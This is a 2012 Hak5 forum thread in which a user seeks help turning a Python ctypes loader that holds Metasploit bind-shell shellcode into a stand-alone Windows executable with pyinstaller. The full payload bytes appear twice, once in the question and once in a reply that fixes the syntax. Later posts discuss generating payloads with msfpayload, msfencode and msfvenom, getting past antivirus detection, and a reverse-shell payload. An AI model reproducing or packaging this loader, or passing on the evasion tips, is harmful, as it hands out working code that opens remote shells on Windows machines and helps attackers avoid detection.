bobbyb1980 Posted May 28, 2012 Share Posted May 28, 2012 (edited) Hello hak5, I am having an issue getting C shellcode to compile from within a python script. What I am trying to do is use pyinstaller to make an .exe out of a python script. from ctypes import * shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" memorywithshell = create_string_buffer(shellcode, len(shellcode)) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell() The above is the script I want to create a .exe out of. The shellcode is in C and it was generated via the following command and pasted into the script. ./msfpayload windows/shell_bind_tcp C Now when I try to build an .exe out of it using pyinstaller, I issue the following: $ python Configure.py .... *completes successfully* $ python Makespec.py --onefile --noconsole pyshell.py wrote /home/pyinstaller-1.5.1/pyshell/pyshell.spec now run Build.py to build the executable $ python Build.py pyshell/pyshell.spec checking Analysis building Analysis because outAnalysis0.toc non existent running Analysis outAnalysis0.toc Analyzing: support/_mountzlib.py Analyzing: support/useUnicode.py Analyzing: pyshell.py Traceback (most recent call last): File "Build.py", line 1494, in <module> main(args[0], configfilename=opts.configfile) File "Build.py", line 1472, in main build(specfile) File "Build.py", line 1429, in build execfile(spec) File "pyshell/pyshell.spec", line 3, in <module> pathex=['/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1']) File "Build.py", line 347, in __init__ self.__postinit__() File "Build.py", line 298, in __postinit__ self.assemble() File "Build.py", line 416, in assemble analyzer.analyze_script(script) File "/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1/mf.py", line 565, in analyze_script co = compile(string.replace(stuff, "\r\n", "\n"), fnm, 'exec') ValueError: invalid \x escape It appears that the script is being run and python is literally interpreting the /x as an escape and I want it to read it as a regular string without paying any mind to the contents. Presumably it will go onto to compile it and give me the .exe and it would be Windows ready. Also tried playing with the syntax of the shellcode, removing the ' and " characters to no avail. Anyone know what's going on here? Edited May 28, 2012 by bobbyb1980 Quote Link to comment Share on other sites More sharing options...
int0x80 Posted May 29, 2012 Share Posted May 29, 2012 Try this: shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted May 29, 2012 Author Share Posted May 29, 2012 (edited) That did the trick int0x, thanks a lot for your help. Edited May 29, 2012 by bobbyb1980 Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted May 29, 2012 Author Share Posted May 29, 2012 Just out of curiosity int0x - does your payload actually work using this method? My payload for a windows/shell_reverse_tcp on port 2020 doesn't seem to want to work on a Windows XP box. Quote Link to comment Share on other sites More sharing options...
int0x80 Posted May 29, 2012 Share Posted May 29, 2012 I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment). Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted May 29, 2012 Share Posted May 29, 2012 Tons of info here :P http://www.offensive-security.com/metasploit-unleashed/Msfvenom msfvenom is just msfpayload + msfencode in the same tool. I tend to use msfpayload and msfencode independently instead of msfvenom but I'd figure it wouldn't matter too much. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted May 30, 2012 Author Share Posted May 30, 2012 I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment). Thanks for the tip. You mean like piping msfpayload to msfencode (same thing in essence as msfvenom ie msfpayload multi/handler PAYLOAD=... | msfencode .... -o whatever.exe?) for an .exe? If I understand you right, I tried that but was being picked up on most anti virus scanners. I also tried msfvenom with various iteration combos w/no luck. I think most of the av's are going to detect msfencoded data. Currently trying to learn shellcoding and it can be a real brain twister. Doing these labs, http://projectshellcode.com/?q=node/12 . Quote Link to comment Share on other sites More sharing options...
int0x80 Posted May 30, 2012 Share Posted May 30, 2012 Actually I've good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the op codes in the column to the left of the instructions. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted May 30, 2012 Author Share Posted May 30, 2012 Starting to see it's not so bad, pretty awesome too : ) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.